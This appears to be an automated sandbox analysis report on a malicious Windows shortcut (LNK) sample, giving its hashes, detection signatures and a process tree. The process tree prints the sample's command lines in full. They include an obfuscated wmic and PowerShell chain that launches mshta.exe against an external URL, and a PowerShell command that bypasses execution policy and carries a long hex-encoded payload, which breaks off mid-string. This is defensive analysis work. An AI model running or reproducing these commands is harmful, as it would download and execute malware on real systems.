Edit tour
Windows
Analysis Report
nTyPEbq9wQ.lnk
Overview
General Information
Sample name: | nTyPEbq9wQ.lnkrenamed because original name is a hash value |
Original sample name: | 3f07684c8928f37a94395ac341b222b4.lnk |
Analysis ID: | 1579759 |
MD5: | 3f07684c8928f37a94395ac341b222b4 |
SHA1: | c55ac3e96ec0c1e9310059ef9862f1f142b37091 |
SHA256: | 76a557c2ff0701d6c2631ac16582c07df84695b64d1fdd1901c1b14479a9f991 |
Tags: | lnkuser-abuse_ch |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Contains functionality to create processes via WMI
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- WMIC.exe (PID: 2452 cmdline:
"C:\Window s\System32 \Wbem\wmic .exe" proc ess call c reate "pow ershell -w 1 powersh ell -Comma nd ('ms' + 'hta' + ' .exe ' + ' https://ti ffany-care ers.com/HA _19-12NGHE P_anh')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 1704 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6592 cmdline:
powershell -w 1 powe rshell -Co mmand ('ms ' + 'hta' + '.exe ' + 'https:/ /tiffany-c areers.com /HA_19-12N GHEP_anh') MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1056 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5860 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " mshta.exe https://ti ffany-care ers.com/HA _19-12NGHE P_anh" MD5: 04029E121A0CFA5991749937DD22A1D9) - mshta.exe (PID: 2764 cmdline:
"C:\Window s\system32 \mshta.exe " https:// tiffany-ca reers.com/ HA_19-12NG HEP_anh MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 1820 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction clea n ($YUBmqn Rj){return -split ($ YUBmqnRj - replace '. .', '0x$& ')};$JQJjs u = clean( '5B4D0AAC7 4AF94B96DE 6D0711E979 6AF44D9558 4C20A8120E 5F4C2D55E0 92A7A2D251 DA39090985 3B5C79690E 93A85CB92B 9FDEFC65F3 CDB1D06CC6 879B451692 8A8BF4DBB1 1970D2A2BD 075032D2FC A7E0D722AA A3530CE3EB 19E65FE575 E8A25BED1C 1BF5DFFD68 3FB4BC2EAA 8FE8F1A605 00155478D8 7FAC118323 C432F5036D 59616B9773 D97224FA5D 5F611314AD E0D4C1D374 8EB30F2D12 7D9E5D8ABF D58BF6DFAB 496B415192 6B4932EB4E 2002C026F0 DAD699E3BF 4E2AFBA35A C0D2467BE2 7D487758C9 F0E13B99AB 91507093DA 9B8C8F3FC0 04623B2AC2 2915FF6DDA 0F2A151FD5 C5BC18FFC2 D1AD49092E 43840545B4 3C3931B943 1F537A4EAF 81384FCE89 E341CB162F 0D74C7C8BB E83A369F44 C7C8AD2314 CDE87C9221 3F354F4343 6DD6766919 0C7CF80EAB 568C8FFE5D F1D7A7289E 9AFCC57749 726D4170CB 358F474A9B 394F92F7A7 C59B69E1D4 F3048A9AF1 B1BF6458C6 DC0905071F C67BF46B82 AB406FD2E0 DD0353A56D B42CC22A38 391221F97A F42C621E21 E76AAD151B 423B4198F3 9A2C8B1B85 21C9400861 EA34B51E60 B32DCF611B 5BA64111CB 29E6119A04 7B3C01F818 9C05F98FAC D727C23B17 202459A773 0C79C74BF8 9421B77606 27C3EF646B 0FA2677D22 9451827319 989785D6B8 F597DD83E8 6CE034F586 EC33BFB81C EA7484471E 4468F516FD 291FF97F14 BF7E804A85 1C2C5526F5 C84BE28FAD D849079EF0 089CEB62A8 08A2394FFC 96A2193967 86CD01610B E36929BF86 5E35CD69E6 A8E9B25947 34C53B954C E005A47ED5 38E28D7BCE 8E8B096462 399F500F3B 6D157E20DB 80631F7036 8AA3E87F3E 6B4A33350E 734FE88F2D 62FD30B450 A5F8061AD2 D42D59E00E B1797E1971 55F3CC5A81 E5A28E6FE0 A7847C64D9 70D00EB321 2F922E5A69 EDCCA6A771 B579DA91E8 062F135579 A2F596F4FB 904E51632E C379875146 9A06B55F43 1B3C278D02 BA162BAD20 51DD8ECEF9 25C3B148AC C6CF884D59 5F47ECED7E E54A234964 C7AC1C5338 6EE8ADD554 3AAB0A0A45 5D9BC24791 A136E50CBE 3C2494A9E1 C02E194A3C 9AECB48945 7F71355B11 D616C94AD1 7918390627 C6F8D0EBFE C0D4B85391 A1F467AEB4 171DF3219B B517EB0741 0A106FF89C CA8023C0CF 6C0F5251A8 E428413363 D25F0B505E 17AEC00369 3E130A590D B8BBE133FF B0BDBC8930 DA536699D6 DAAC01BB7F D671DBE8DE FF6B4028FE 57FCB454DA D571F21C46 E58BED7CC6 7F8F8B3F12 4E43476CD6 7F681F52F9 E21044F8C5 361A690A89 3FA06D69E2 DB01A27F35 03C04BE81B B4A323F8EE CBA5358DDB 14C9EC0469 AEE1544FB4 84B6D1A672 4132B29F84 51BF425B1B 9762AA86E3 A6ED9A2876 0C77FEC629 AE93E74262 197D8D6B10 F23ED27497 ECC808D24E 7D6E88CEB1 D578878581 6C5FA9EAB8 7109E431C7 C6442BA4FC 96DA32D084 1A2C60881B 66136D6345 2D540BE93E 778EDEC6BA 91D01916A1 EEC4EB6A74 F22241194E C1EEDC1452 8EAC307306 F8E6CAAAC6 8402C965A0 CE3A683F3B F2B61F6BEB D7EC1347EE CF6D52329C 0F2D6EE0FD C59AD85C3A 7B382EE197 C38A04DDE6 FEF2EBDF6F 21091DD434 E3ED41F090